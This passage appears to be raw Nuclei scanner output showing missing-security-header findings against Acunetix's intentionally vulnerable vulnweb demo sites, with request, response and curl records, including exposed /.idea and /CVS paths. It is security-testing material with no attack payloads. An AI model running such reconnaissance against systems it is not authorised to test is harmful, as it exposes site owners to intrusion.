type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:22.20099052Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.338822609Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.338856738Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.338828976Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.970830168Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.970874252Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca 